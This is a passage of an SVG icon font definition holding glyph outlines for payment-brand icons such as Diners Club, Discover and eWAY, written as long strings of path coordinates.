0 0-1 0-2 1-2 13-13 17-23 16-13-1-23-9-26-22-3-12-2-24 6-34 5-7 12-11 21-12 11-1 20 5 23 16 0 0 0 2 1 1 1 0 1 0 1-1 0-5-1-9-2-13 0-1 0-2-1-2-14-6-29-7-43 0-11 6-16 15-18 27z m28-90c0 0 1 0 1-2 0-1-1-1-1-1-5 1-10 1-15 0-1 0-2 0-2 1 0 1 1 2 1 2 3 0 4 0 4 3v28c0 3-1 4-3 4-1 0-2 0-2 1 0 2 1 1 2 1 0 0 1 0 1 0 5 0 9 0 13 0 1 0 2 0 2-1 0-1-1-1-1-1-3 0-4-1-4-4v-28c0-3 1-3 4-3z m28-3c-1 0-3-1-4 0-11 0-19 6-21 15-3 13 6 26 19 26 8 0 16-2 20-9 8-12 0-30-14-32z m58 34c0-2 0-4 0-6 0-9 0-18 0-28 0 0 1-1 0-1-1 0-2 0-3 1-2 3-4 5-6 7l-21 23c0 1 0 1-1 1v-23c0-4 1-6 6-5 1 0 1-1 1-2s-1-1-1-1c-5 1-9 1-14 0-1 0-1 1-1 1 0 1 0 1 1 2 4 0 5 1 5 5 0 8 0 17 0 26 0 2-2 4-4 4-1 0-2 0-2 1 0 2 1 1 2 1 3 0 6 0 9 0 1 0 2 0 2-1 8-8 15-17 22-25 1 0 1-1 2-2 0 8 0 14 0 21 0 3-2 5-5 5-1 0-1 0-1 1 0 1 0 1 1 1 4 0 9 0 13 0 1 0 1 0 1-1 0-1 0-1-1-1-3 0-4-1-5-4z m44-34c-5 1-10 1-14 0-1 0-2 1-2 1 0 1 0 2 1 2h2c1 0 2 0 1 2-1 3-2 5-2 8-1 1-1 1-2 1-2 0-3 0-5 0-2 0-3 0-5 0-1 0-1 0-2-1 0-2-1-5-2-7 0-2 0-3 3-3 0 0 0 0 1 0 1 0 1-1 1-2 0-1-1-1-2-1-3 1-7 1-11 0 0 0-1 0-1 1 0 1 0 2 1 2 2 0 4 1 4 3 4 11 8 21 11 32 1 1 1 1 2 2 1 0 2 0 3 1 1 1 2 1 3-1 2-7 4-13 7-20 1-5 3-10 5-14 0-2 1-3 3-3 1 0 1-1 1-1 0-1 0-2-1-2z m35 9l-2-8c0-1-1-1-1-1h-28c-1 0-1 0-1 1 0 2 0 2 1 2 3 0 4 1 4 3v29c0 2-1 3-4 3-1 0-1 0-1 1 0 1 0 1 1 1 2 0 4 0 6 0 3 0 6 0 9 0 1 0 2 0 2-1s-1-1-2-1c-3 0-4 0-4-4v-27c0-3 1-3 4-4 2 0 5 0 7 0 3 1 5 2 6 5l1 2c0 1 1 0 1 0 2 0 1 0 1-1z m-657 149c-50 0-90-41-90-90 0-50 40-90 89-91 51 0 91 41 91 91 0 49-40 90-90 90z m-21-91v-51c0-2 0-2-1-1-6 2-10 5-15 9-10 9-16 19-19 32-5 22 5 46 23 58 3 3 7 5 11 6 1 1 1 1 1-1 0-17 0-34 0-52z m71-27c-6-12-16-20-28-25-1-1-2-1-2 1 0 17 0 34 0 52v51c0 2 0 2 2 1 31-13 44-50 28-80z m141 35c0-6 3-8 9-9 1 0 2 0 3 0 12 0 21 5 26 16 3 7 3 15 2 22-1 7-3 13-8 18-6 7-15 10-25 10-1 0-3-1-6-1-1 0-1 0-1-1 0-1 0-1 0-2 0-18 0-35 0-53z m428-1c1-4 4-9 9-10 5-1 10 1 13 5 7 8 6 22-1 30-7 7-13 7-20 1 0 0-1-1-1-2v-12c0-4 0-8 0-12z m-285 21h17c1 0 2 0 2 2 1 5-4 11-10 10-5-1-10-6-10-11-1-1 0-1 1-1z m-7-57c-1 0-1-1-1-2v-7c0-2 0-4 0-6 0-2 1-2 2-2 1 0 2 0 3 0 2 1 4 1 5 3 1 3 2 7 0 10-2 3-5 4-9 4z m177-8c-1-3-1-6-1-8 0-6 1-10 3-14 3-4 7-6 12-5 5 0 8 3 10 9 0 2 0 4 1 6 0 6-1 11-5 15-6 8-16 6-20-3z m92-12h10c-2 5-3 10-5 15-2-5-3-10-5-15z m-184 0h9c-1 5-3 10-4 15-2-5-4-10-5-15z" />
<glyph glyph-name="diners-club-alt-3" horiz-adv-x="1000" unicode="&#xeccc;" d="M277 453c-22 16-47 25-75 27-13 1-26 0-37 0h-33c-16 0-31-2-45-7-29-10-52-28-68-54-11-18-17-37-19-58-2-32 6-61 25-87 26-36 62-54 107-54 20-1 41 0 62 0 6 0 13 0 19 1 25 4 47 14 66 29 30 24 48 55 50 93 1 20-2 39-10 57-9 22-23 39-42 53z m-146-222c-65 0-118 54-118 119 0 66 53 120 119 120 66 0 119-54 119-119 0-66-53-120-120-120z m229 205c1 0 2 0 4 0 3-1 5-3 6-6 1-2 1-5 1-7v-63c0-9-1-11-11-12-2 0-1-1-2-3 0-1 1-1 2-1 13 0 25 0 38 0 8 0 15 1 23 3 28 9 41 41 26 67-7 14-19 21-34 24-10 2-20 2-31 1-6 0-14 0-21 1-1 0-3 0-2-2-1-1-1-2 1-2z m26-1c3 0 6 0 7 0 14 0 25-3 34-13 6-7 9-14 10-23 2-10 1-20-3-29-6-15-18-21-34-22-1 0-3 0-4 0-8 1-12 5-12 12v70c0 1 1 2 0 3 0 1 1 2 2 2z m547 3c5-1 6-2 6-7 0-1 0-2 0-3v-61c0-7-1-13-2-20 0-1 0-2 1-3 2-1 3 0 4 1 1 1 3 1 5 0 6-3 13-4 19-3 13 1 22 9 27 21 5 11 5 23-3 34-7 10-20 12-30 6-4-1-7-4-10-6v49c0 3 0 3-3 2-4-3-9-5-14-6 0-1-1-1-1-2 0-1 1-1 1-2z m19-44c9 7 17 7 25-2 10-10 11-29 1-40-4-5-10-7-16-6-7 1-12 7-12 13 0 6 0 11 0 16v16c0 1 1 2 2 3z m-184-46c19-10 38-7 58 0 0 1 1 1 1 2 1 6 2 12 3 18 0 1-1 1-2 2-2 1-2-1-2-2-4-15-16-23-30-22-11 2-20 7-27 16-11 14-13 30-9 46 4 17 17 28 35 29 13 1 28-4 31-21 0-2 2-1 3-1 1 0 1 1 1 1-1 6-1 12-1 17 0 1-1 2-2 2l-9 3c-15 4-29 5-43 0-19-8-31-25-31-45 0-3 0-6 1-9 2-16 9-28 23-36z m-274-4h25c1 0 2 0 2 2 0 2-1 2-2 2-1 0-3 0-4 0-2 0-3 1-3 4v39c0 1 0 2 1 2 3 3 7 5 12 6 9 2 15-3 15-12v-34c0-4-1-5-5-5-1 0-1 0-2 0-1 0-2 0-2-2 0-2 1-2 2-2h25c2 0 2 0 2 2 0 2 0 2-2 2-1 0-1 0-2 0-4 0-5 1-5 5v32c0 3 0 5 0 8-1 9-7 14-16 14-4 0-8-1-11-3-5-2-8-4-12-7v8c0 1-1 2-3 1-5-2-10-4-15-5-2-1-2-2-1-3 0-1 1-1 1-1 5-2 7-5 7-10-1-11-1-22-1-34 0-4 0-5-5-5h-1c-1 0-3 0-3-2 0-3 1-2 3-2z m372 57c5-1 6-3 6-8 0-3 0-5 0-8 0-10 0-20 1-30 0-8 6-13 14-13 5 0 9 1 13 3s8 5 12 8v-9c0-2 0-2 1-2 6 2 12 3 18 4 1 0 1 1 1 1 0 2 0 2-1 2-2 0-3 0-4 0-4 0-4 0-4 4v49c0 2-1 3-3 2-6 0-12-1-18-1-1-1-2 0-2-2 0-1 0-1 2-2 2 0 5-1 7-2 2-1 3-2 3-4 0-11 0-23 0-34 0-1 0-2-1-2-4-3-8-6-13-7-6-2-12 1-14 7-1 3-1 5-1 8v36c0 3 0 4-3 3-5 0-9 0-14 0-1-1-2 0-2-2 0-1 1-1 2-1z m-275-59c9 2 14 8 20 14 0 1 0 2-1 2-1 1-1 1-2 0-1-1-3-2-4-3-12-9-25-5-31 8-2 5-2 11-2 17 0 1 0 2 2 2 5 0 11 0 17 0h18c1 0 3 0 3 2 0 6-2 11-6 16-10 10-27 9-37-2-10-13-11-27-5-41 5-12 16-17 28-15z m-20 45c1 8 7 14 14 15 8 1 15-6 14-13-1-2-2-3-4-3h-22c-1 0-2 0-2 1z m25-122c-3 0-4 2-6 4-3 5-6 10-10 15 0 1-2 2-2 3 0 1 3 2 4 2l1 2c5 4 6 8 5 14-2 5-5 7-10 8-2 1-5 1-8 1-5 0-10 0-15 0-3 0-5 0-8 0-1 0-1 0-1-1 0-1 0-2 1-2 5 0 6-1 6-6v-35c0-4-1-5-5-6-2 0-2 0-2-1 0-2 1-2 2-2 4 0 8 1 13 0h7c1 0 2 0 2 2 0 1 0 1-2 1-4 0-5 1-5 6 0 4 0 8 0 13 0 3 0 3 3 3 2-1 2-2 2-3 4-7 9-14 14-20 0-1 1-2 2-2 4 1 8 1 12 0 1 0 2 0 2 1 0 1 0 2-2 3z m-21 28c-1-2-3-3-5-4-2 0-3 0-5 0-2 0-2 0-2 2 0 3 0 6 0 9 0 3 0 6 0 9 0 1 0 2 2 2 4 0 8 0 11-5 2-4 2-9-1-13z m262 51c8 0 17 0 25 0 2 0 2 0 2 2 0 2-1 1-2 1-7 1-7 1-7 8v88c0 2 0 3 0 4 0 1-1 2-2 1-5-3-10-5-15-6-1-1-1-1-1-2 0-1 1-1 1-1 4-1 6-4 6-8 0-1 0-3 0-4v-73c0-6-1-6-6-7h-1c-1 1-2 0-2-2 0-1 1-1 2-1z m-177-31c0 1 0 1-1 1-6 0-12 0-18 0-1 0-2 0-2-1 0-1 1-2 2-2 5 0 7-2 7-8v-23c0-1 0-2-1-2 0 0-1 1-1 2-10 11-20 21-29 32-1 1-2 2-3 2-5 0-9 0-14 0-1 0-1 0-1-1s0-2 1-2c5 0 7-3 7-7v-24c0-3 0-7 0-10-1-4-2-5-7-6-1 0-1-1-1-2 0-1 1-1 1-1 6 1 12 1 18 0 1 0 1 0 2 1 0 2-1 2-2 2-5 0-6 2-6 5-1 11 0 22 0 33 1-1 1-2 2-2l30-34 5-5c1-1 2-1 3-1 1 0 0 1 0 2 0 13 0 27 0 40 0 1 0 2 0 3 1 4 3 6 7 6 1 0 1 1 1 2z m-217 1c-6 0-12 0-18 0-1 0-1 0-1-1 0-1 0-2 1-2 6 0 7-2 7-7v-26c-1 0-1 1-2 2l-29 33c-1 0-2 2-3 1-4 0-9 0-13 0-1 0-1 0-1-1 0-1 0-2 1-2 4 0 6-2 6-7v-30c0-2 0-3 0-5-1-3-2-4-6-5-1 0-1 0-1-1 0-2 1-2 2-2 5 1 11 1 16 0 1 0 2 0 2 2 0 2-1 1-2 1-4 0-6 2-6 6 0 5 0 10 0 15v17c10-10 19-21 28-31 3-3 6-6 9-10 1-1 2-1 4-1 1 1 0 2 0 3 0 14 0 28 0 42 0 4 2 6 6 6 1 0 1 1 1 2 0 1 0 1-1 1z m461-1c0 1-1 2-2 1-6 0-11 0-17 0-1 0-2 0-2-1 0-2 1-2 2-2 4 0 6-2 6-6 0-9 0-18 0-28-1 2-1 2-2 3-10 11-19 22-29 32-1 1-2 3-3 2-4 0-8 0-13 0 0 0-2 1-2-1 0-2 1-2 2-2 4 0 6-2 6-5 0-12 0-23 0-35 0-4-2-6-6-6-2-1-2-1-2-2 0-1 1-2 2-1 6 0 12 0 17 0 2-1 2 0 2 1s0 2-2 2c-5-1-6 2-6 7v30c0 0 1 0 1-1 9-10 18-20 27-30 3-3 6-6 9-10 1-1 2 0 3 0 1 0 1 0 1 1-1 12 0 24-1 36 0 3 0 5 1 8 0 4 2 5 6 5 1 0 2 1 2 2z m-92 2c-18 0-30-16-27-34 3-12 14-21 29-21 1 0 3 1 5 1 19 3 29 26 19 42-7 10-16 13-26 12z m18-30c0-3 0-6-1-9-2-7-6-11-12-11-7-1-13 1-16 7-4 5-5 11-5 18 0 3 0 7 2 11 5 12 19 14 27 4 4-6 6-13 5-20z m-165 72c0-3 0-6 0-9 0-1 1-2 2-2 8-4 16-5 24-3 8 2 14 8 15 15 1 8-2 14-11 18-4 2-8 4-12 6-3 1-5 3-7 5-4 5-2 12 4 14 7 3 16 1 19-9 0-1 0-1 0-2 1-2 2-1 3-1 1-1 1 0 1 1 0 4-1 7-1 11 0 1 0 2-1 2-7 3-13 4-20 3-8-1-14-7-16-14-1-8 2-15 10-19 3-2 7-4 10-5 3-2 6-3 8-5 5-6 2-15-6-17-6-1-13 2-17 8-1 2-2 5-3 7 0 1 0 2-1 2-1-1-2-1-2-2 0-1 0-3 1-4z m-50-13c11 0 22 0 33 0 1 0 1 0 1 2s0 2-1 2c-3-1-6-1-9 0-3 0-4 1-4 4 0 11 0 22 0 33 0 4 2 7 6 9 4 3 7 1 10-1 3-2 7 0 9 3 2 5-1 9-5 10-5 1-9-1-12-4-3-2-5-6-8-10v13c0 2-1 2-3 1l-14-7c-1 0-1 0-1-1 0-1 0-2 1-2 1 0 1 0 2 0 3-2 4-4 4-7 0-3 0-6 0-10v-27c0-3-1-4-4-4-2-1-3-1-5-1s-1 0-1-1c0-2 0-2 1-2z m-73-70c-1 1-2 0-2-1-1-3-3-6-7-7-4-1-8-1-12 0-3 0-4 2-4 4 0 5 0 10 0 16 0 1 0 1 1 1 2 0 4 0 6 0 5 0 6-1 7-5 0-1-1-2 1-2 2 0 2 1 2 2 0 4 0 9 0 13 0 1 1 3-1 3-2 0-2-1-2-2-1-3-2-4-6-4h-6c-2 0-2 0-2 1 0 5 0 11 0 16 0 1 0 1 1 1 3 0 7 1 10 0 5 0 7-1 7-6 1-1 0-2 2-2 1 0 2 1 2 2-1 3-1 6-1 9 0 1 0 2-2 2-11-1-22-1-34 0-1 0-2 0-2-2 0-1 1-1 2-1 4-1 5-2 5-5v-38c0-3-2-4-5-4-1 0-2 0-2-2s1-1 2-1h18s12 0 18 0c2 0 3 0 3 2 1 3 1 5 2 8 0 1 1 2-1 2z m412-9c-3 0-4 1-5 4-2 6-4 12-6 18-3 9-7 18-10 27 0 2-1 3-3 1-1 0-3-1-4-2-1 0-2-1-2-2-5-14-10-28-15-42-1-2-2-4-5-4-2-1-2-1-2-2 0-2 1-2 2-2 5 1 10 1 15 0 1 0 1 0 1 2 0 1 1 2-1 1 0 0-1 0-1 0-4 1-5 2-4 5 1 3 2 6 3 9 1 1 1 2 3 2 2 0 4 0 6 0 2 0 4 0 7 0 1 0 1 0 2-2l3-10c1-2 0-3-2-4-1 0-1 0-2 0-1 0-1 0-1-1 0-1 0-2 1-2 7 1 13 1 20 0 1 0 1 1 1 2 0 1 0 2-1 2z m-34 20c2 6 4 13 6 20 2-7 4-14 6-20h-12z m-210-20c-2 0-3 1-4 3-2 5-4 10-5 15-4 10-8 21-11 31-1 2-2 3-4 2-1-1-3-2-4-3-1 0-1-1-2-1l-14-43c-1-2-3-4-6-4-1 0-1-1-1-2 0-1 0-1 1-1 5 0 10 0 15 0 1 0 2 0 2 1 0 1 0 2-2 2h-1c-3 0-4 1-3 4l3 9c0 2 1 2 2 2 4 0 9 0 13 0 1 0 2 0 2-1 1-4 2-7 3-10 1-3 1-4-3-4-1 0-2-1-2-2 0-2 1-1 2-1 4 0 8 0 12 0 2 0 5 0 7 0 1 0 2 0 2 1 0 1 0 2-2 2z m-34 20c2 6 4 13 6 20 3-7 5-14 7-20h-13z m81 31c0 0-1 1-2 0 0-2-2-2-3-2h-39c-2 0-3 0-4 2 0 1-1 1-2 0s-1 0-1-1c0-3 0-7-1-10 0-1 0-2 1-2 1 0 2 0 2 1 0 0 0 1 0 1 1 4 2 5 6 5l11 0c1 0 2 0 2-2v-37c0-6-1-6-7-6-1 0-1-1-1-2 0-1 0-2 2-2 7 1 14 1 22 0 1 0 1 1 1 2 0 1 0 1-1 2-5 0-6 1-6 6v37c0 2 0 2 2 2 3 0 6 0 9 0 4 0 5-1 6-5 0-1-1-2 1-2 0 0 2 0 2 2 0 3 0 7 1 10 0 0 0 1-1 1z m-259 0c-1 0-2 1-2 0-1-2-2-2-4-2h-39c-1 0-3 0-3 2-1 1-2 0-2 0-1 0-1 0-1-1 0-4-1-7-1-10 0-1-1-2 1-2 1 0 2-1 2 1 0 0 0 1 0 1 1 4 2 5 6 5 3 0 7 0 10 0 2 0 2-1 2-3l0-36c0-6-1-6-6-6-1 0-1-1-1-2s0-2 1-2c5 1 9 1 13 1 4 0 7 0 10-1 1 0 1 1 1 2s0 2-1 1c-6 0-7 3-7 7 0 6 0 12 0 18v19c0 1 1 2 2 2 3 0 6 0 9 0 5 0 6-1 6-6 1 0 0-1 1-1 1 0 3 0 3 2-1 3 0 7 0 10 0 1 1 1 0 1z m-38 28c9 0 17 0 26 0 1 0 2 1 1 3 0 1-2 0-3 0-5 1-6 1-6 7v50c0 3 0 3-3 2-4-2-8-3-13-5 0 0-2 0-2-1 0-1 1-2 2-2 4-2 5-5 5-10 0-11 0-22 0-34 0-6 0-7-7-7-1 0-2 0-2-2 0-1 1-1 2-1z m539-69c0 0-2 0-2-1 0-1 0-1-1-2-1-4-4-6-8-6-3-1-6-1-9-1-4 1-5 2-5 6v35c0 5 0 5 5 5 1 0 2 0 2 2s-1 1-2 1c-4 0-8 0-12 0-3 0-5 0-8 0-2 1-2 0-2-1 0-2 1-2 2-2 4 0 5-1 5-4v-38c0-3-1-4-5-4-1 0-2 0-2-2s1-1 2-1h37c1 0 2 0 2 1l2 10c0 1 1 2-1 2z m-620-10c-3 0-4 1-4 4v37c0 4 1 5 5 5 1 0 1 1 1 2 0 1 0 1-1 1-7 0-14 0-21 0-1 0-1 0-1-1 0-1 0-2 1-2 5 0 5-1 5-5v-37c0-3-1-4-4-4-2 0-2-1-2-2 0-2 1-2 2-1 6 0 13 0 19 0 1-1 2-1 2 1 1 2 0 1-2 2z m402 46c1 0 2 0 2 2 0 2-1 1-2 1-6 0-12-1-17 0-1 0-1 0-2 0-1 0-2 1-2-1 0-2 1-2 2-2 3 0 4-1 4-4v-38c0-4-1-4-5-5-1 0-1 0-1-1 0-2 1-2 2-2 6 1 13 1 19 0 1 0 2 0 2 2 0 2-1 1-2 1-3 1-4 2-4 5v38c0 3 1 4 4 4z m-308 117c3-1 6 2 6 6 1 4-2 7-6 7-3 0-7-3-7-6 0-4 3-7 7-7z m-311-8c-3 1-3 1-3-2v-136c0-2 0-2 2-1 17 7 29 18 37 33 22 40 5 88-36 106z m-60 0c-4-2-9-5-14-8-24-16-37-48-30-77 3-17 12-31 25-42 6-5 12-9 19-12 3-1 3-1 3 1v68c0 23 0 46 0 68 0 3-1 3-3 2z" />
<glyph glyph-name="diners-club" horiz-adv-x="1000" unicode="&#xeccd;" d="M968 503c-28 65-71 117-127 159-68 50-143 77-227 83-41 3-81 0-114 1-38 0-69 0-100 0-47 0-93-7-137-23-87-30-156-84-205-163-33-54-51-114-56-177-8-97 15-186 73-264 80-108 190-163 325-165 63-1 126 0 189 0 20 0 40 2 60 5 74 11 141 41 200 89 90 72 144 165 150 281 4 61-7 119-31 174z m-570-515c-198 1-360 163-360 363 0 199 161 362 362 362 200 0 363-162 363-361 0-200-162-365-365-364z m92 574c-7 3-7 3-7-5v-206c0-69 0-138-1-207 0-7 2-7 8-5 49 22 87 55 112 102 65 120 13 267-112 321z m-179 1c-15-7-29-15-43-24-73-50-112-147-93-234 12-51 36-95 78-129 18-15 37-27 58-37 7-3 7-3 7 6v206c0 69 0 138 0 207 0 7-2 7-7 5z" />
<glyph glyph-name="discover-alt" horiz-adv-x="1000" unicode="&#xecce;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-48-256h36c14 0 25-3 33-10s11-15 11-27c0-19-9-31-28-35l39-52h-30l-33 49h-4v-49h-24v124z m-85 0h69v-21h-44v-28h43v-21h-43v-33h44v-21h-69v124z m-104 0l33-84 34 84h27l-54-128h-13l-53 128h26z m-131-17c13 14 29 20 48 20s34-6 47-20c14-13 20-29 20-47s-6-35-20-48c-13-13-29-20-47-20s-35 7-48 20c-13 13-20 29-20 48 0 18 7 34 20 47z m-105 1c13 12 29 19 47 19 10 0 20-3 30-8v-28c-10 9-20 14-30 14-12 0-21-4-29-13s-12-18-12-30c0-13 4-23 12-31 8-8 18-12 30-12 10 0 20 5 29 14v-29c-10-5-20-7-30-7-19 0-34 6-47 19s-19 28-19 46c0 18 6 33 19 46z m-59-59c-2 2-8 4-17 7-11 4-19 9-24 14s-6 12-6 20c0 10 3 19 11 26s16 10 27 10c15 0 27-5 37-14l-13-16c-6 6-12 10-20 10-5 0-9-1-12-4s-5-6-5-10c0-3 1-6 3-9 3-2 8-4 15-7 14-5 23-10 28-15s8-14 8-23c0-13-4-23-12-30-8-8-18-12-31-12-18 0-32 8-43 24l16 15c6-11 15-16 26-16 6 0 10 2 14 5 3 3 5 7 5 12 0 6-2 10-7 13z m-121-35c-11-10-26-14-44-14h-36v124h36c19 0 35-6 48-17 12-12 18-27 18-45 0-19-7-35-22-48z m34 110h24v-124h-24v124z m738-251c0-85-69-154-154-154h-572c628 25 726 291 726 291v-137z m-821 230h-7v-82h7c15 0 26 3 33 9 9 9 13 19 13 32 0 13-4 23-13 31-7 6-18 10-33 10z m709-17c0 12-7 18-23 18h-8v-37h8c15 0 23 6 23 19z" />
<glyph glyph-name="discover" horiz-adv-x="1000" unicode="&#xeccf;" d="M108 411c-16 15-37 22-62 22h-46v-160h46c23 0 43 6 57 18 19 17 29 37 29 62 0 24-8 43-24 58z m-26-99c-9-8-23-12-42-12h-9v106h9c19 0 33-5 42-13 12-10 18-24 18-40 0-17-6-30-18-41z m64 121h32v-160h-32v160z m108-61c-9 3-16 6-19 9-3 3-5 6-5 11 0 5 2 9 6 12 5 4 10 6 17 6 9 0 18-5 26-13l16 21c-13 12-29 18-47 18-14 0-26-5-36-14s-14-19-14-32c0-11 3-20 9-27s16-12 30-17c12-5 19-8 22-10 6-3 9-9 9-16 0-6-2-12-7-16s-10-7-17-7c-15 0-27 7-34 22l-20-20c14-20 32-30 55-30 16 0 30 5 40 14 10 10 15 23 15 39 0 12-3 22-10 29-6 7-18 14-36 21z m81 40c-16-16-25-36-25-59s8-43 25-60c16-16 36-24 60-24 13 0 26 3 39 9v37c-12-12-25-18-38-18-15 0-28 6-38 16s-16 24-16 40c0 15 6 28 16 39s22 16 37 16c14 0 27-6 39-18v37c-13 6-26 9-39 9-23 1-43-8-60-24z m196 25c-24 0-44-8-61-25s-26-38-26-62 9-45 26-62 37-25 61-25 45 8 62 25 26 38 26 62-9 45-26 62-37 25-62 25z m46-133c-12-12-28-19-46-19-17 0-33 7-45 19s-19 28-19 46c0 18 6 33 19 46s28 19 45 19c18 0 34-7 46-19s19-28 19-46c0-18-6-33-19-46z m-46 101c-15 0-28-6-38-16s-16-24-16-39 5-28 16-39c10-10 23-16 38-16s28 6 39 16c11 11 16 24 16 39s-5 28-16 39c-11 10-23 16-39 16z m28-83c-7-7-17-11-27-11s-21 4-28 11c-8 8-12 17-12 28 0 11 4 20 12 28s17 11 28 11 20-3 27-11c8-8 12-17 12-28 0-11-4-20-12-28z m-28 57c-7 0-14-3-20-9-5-5-8-12-8-20 0-8 3-14 8-20 6-6 13-8 20-8s15 3 21 8c5 6 8 12 8 20 0 8-3 15-8 20s-13 9-21 9z m151-54l-43 108h-34l68-164h17l70 164h-35z m91-52h89v27h-57v43h55v27h-55v36h57v27h-89z m177 67c24 5 36 21 36 46 0 15-5 26-15 35s-24 12-42 12h-46v-160h31v64h4l44-64h38l-50 67z m-27 19h-9v49h10c20 0 30-8 30-24 0-17-10-25-31-25z" />
<glyph glyph-name="eway-alt" horiz-adv-x="1000" unicode="&#xecd0;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-225-295c17 7 34 11 52 7 10-1 19-5 26-13 5-5 7-12 7-19 0-31 0-61 0-92 0-3 1-4 4-4l5 0c3 1 3-1 3-3 0-2 0-3-2-3-10 1-20 1-30 0-3 0-3 1-3 3 0 7 0 13 0 19-3-6-7-11-12-16-14-13-40-13-55-1-7 6-11 13-12 23-1 10 1 20 8 28 6 6 14 9 22 11 12 3 25 5 37 8 12 3 12 3 12 16 0 8 1 15 0 22-2 10-8 15-17 17-14 1-22-3-28-15-5-9-8-18-11-27-1-3-3-4-6-3-1 0-1 1-1 1v39c0 1 0 2 1 2z m225-212c-23 3-46 7-69 10-19 3-37 5-56 8-20 2-40 4-60 5-38 2-76 3-114 3-25 0-49 0-74 0-23 0-45 0-68-1-29-1-58-2-86-4-22-1-43-3-65-5-40-4-79-9-118-19-1 0-3-1-5-1 48 23 99 36 151 46-9 1-18 2-26 5-55 18-89 55-100 111-9 47 4 89 37 125 23 23 51 38 84 42 46 6 86-8 119-40 19-19 32-42 38-68 1-2 2-3 4-3 14 0 27 0 41 0 2 0 3-1 3-3 0-2-1-3-3-3-3 0-7 0-11 0-2 0-2-1-2-3 7-17 12-34 18-51 5-14 10-28 15-43 0 0 0-1 1-1 2 5 4 10 6 15 4 13 9 27 13 40 1 2 1 4 0 6-3 11-7 23-11 34-1 2-2 3-4 3l-10 0c-2 0-2 1-2 3 0 2-1 3 2 3 20 0 40 0 60 0 2 0 2-1 2-3 0-2 0-3-3-3l-18 0c-3 0-3 0-2-3 9-28 19-56 28-84 2-4 3-8 5-12 1 2 1 4 2 6 10 30 21 60 32 90 1 3 1 3-3 3-5 0-10 0-15 0-2 0-2 1-2 3 0 2 0 3 2 3 10 0 20 0 30 0 3 0 3-1 3-3 0-2 0-4-3-3-2 0-3-1-4-3l-43-120c-1-3-2-4-5-4-1 1-1 0-2 0-8 0-8 0-10 8-8 22-15 44-23 66 0 1 0 2-1 2-2-5-4-10-5-15-7-19-14-38-21-58 0-2-1-3-3-2-4 0-8-2-10 0-3 2-3 6-4 9l-39 114c-1 1-1 3-3 3-2 0-2 0-2-2 2-12 2-23 1-35-3-28-12-52-29-74-15-19-33-33-54-43-1-1-2-1-3-2 123 13 245 13 367-10-3 1-3 3-3 6l0 34c0 1-1 3 2 3 2 0 4 1 5-3 2-9 5-18 8-27 0-2 1-4 2-6 3-6 9-7 14-3 4 3 7 8 9 13 4 7 7 15 9 23 0 1 0 2 0 3-17 41-34 81-50 121-1 1-2 2-4 2-1 0-3 0-4 0-3 0-3 1-3 3 0 2 0 3 2 3 17 0 34 0 51 0 2 0 2-1 2-3 1-2 0-3-2-3-6 0-11 0-17 0 13-30 25-59 38-90 10 31 20 60 30 90-6 0-13 0-19 0-2 0-3 1-3 3s0 3 3 3c12 0 24 0 36 0 2 0 3-1 3-3 0-2 0-3-3-3 0 0-1 0-1 0-8 0-8 0-11-8l-47-134c-2-6-4-11-7-16-5-8-12-12-21-12 44-11 88-23 129-42-7 1-14 3-21 4z m-455 142c1 2 1 3-2 3-17 0-34 1-51 1-2 0-3-1-3-3-4-8-10-14-19-17-9-2-18-2-27 0-16 2-34 16-33 40 0 3 1 4 4 4 22 0 43 0 65 0h66c2 0 3 0 3 3 0 4 0 7 0 11 0 17-3 32-9 47-8 19-20 34-38 42-31 14-62 14-93 2-20-7-35-20-43-40-15-32-15-65-3-99 9-23 25-39 50-46 26-8 52-9 79-1 27 8 44 27 54 53z m-102 99c16 3 34-5 43-19 3-5 4-10 5-16 0-2-1-3-3-3-12 0-24 0-37 0h-36c-2 0-3 1-3 3 0 17 13 31 31 35z m391-84c-5-3-11-5-17-6-6-1-12-2-17-5-7-3-12-7-14-14-2-10-2-19 0-28 1-6 5-10 11-12 5-2 9-2 13-1 11 3 18 10 22 20 5 11 6 22 5 32 0 5 0 8 0 12 0 3-1 3-3 2z" />
<glyph glyph-name="eway" horiz-adv-x="1000" unicode="&#xecd1;" d="M824 183c13 0 22 5 28 16 5 7 8 14 11 22l64 183c3 10 3 10 14 10 1 0 1 0 2 0 3 0 3 2 3 4 0 3 0 4-3 4-17 0-33 0-50 0-3 0-3-1-3-4s0-4 3-4c9 0 18 0 27 0-14-40-28-80-42-122-17 42-34 82-51 122 8 0 16 0 23 0 3 0 4 1 4 4-1 3-1 4-4 4-23 0-46 0-69 0-2 0-3-1-3-3 0-4 0-5 4-5 2 1 4 0 6 0 3 1 4-1 4-3 23-54 46-109 68-163 1-2 2-4 1-5-3-11-7-22-12-32-3-6-7-13-12-17-7-5-15-4-19 4-2 2-3 5-4 8-4 12-7 24-10 37-2 5-5 3-7 3-4 0-2-3-2-4l0-46c0-3 0-6 3-8-166 31-332 31-499 14 1 1 3 2 4 3 29 13 54 32 74 58 23 30 36 63 39 101 2 16 1 31-1 47-1 3 0 3 2 3 4 0 4-2 4-4l54-155c1-4 2-9 5-12 3-3 9 0 13-1 3 0 4 1 5 4 9 26 19 52 28 79 2 7 5 13 7 20 2-1 2-2 2-3 10-30 20-60 30-89 4-11 4-11 15-11 1 0 2 0 3 0 4-1 5 1 6 5 20 54 39 108 59 163 1 3 2 5 6 4 3-1 3 2 3 4 0 2 0 4-3 4-14 0-27 0-41 0-3 0-3-1-3-4 0-2-1-4 3-4 7 0 14 0 21 0 4 0 4 0 3-4-15-41-29-82-44-123 0-2-1-5-2-8-3 6-4 12-6 17-13 38-26 76-39 114-2 4-1 4 3 4 8 0 17 0 25 0 3 0 3 2 3 4 0 2 0 4-3 4-27 0-54 0-81 0-3 0-3-2-3-4 0-2 0-4 3-4 5 0 9 0 14 0 3 0 4-1 5-4 5-15 10-31 16-46 1-3 1-6 0-9-7-18-13-36-19-54-2-7-5-14-7-21-1 1-1 2-2 3-6 19-13 38-20 57l-24 70c-1 3-1 4 2 4 5 0 10 0 15 0 3 0 4 1 4 4 0 4-1 4-4 4-19 0-37 0-56 0-3 0-4 1-5 4-9 36-26 67-52 93-45 43-100 62-162 54-45-6-83-25-114-58-45-47-63-104-50-169 15-76 61-126 135-151 12-3 24-5 36-7-70-14-140-31-205-62 2 0 4 0 7 1 52 13 106 20 160 25 29 3 58 6 88 8 39 2 78 4 117 5 31 1 62 1 93 2 33 0 66 0 100-1 51 0 103-1 155-4 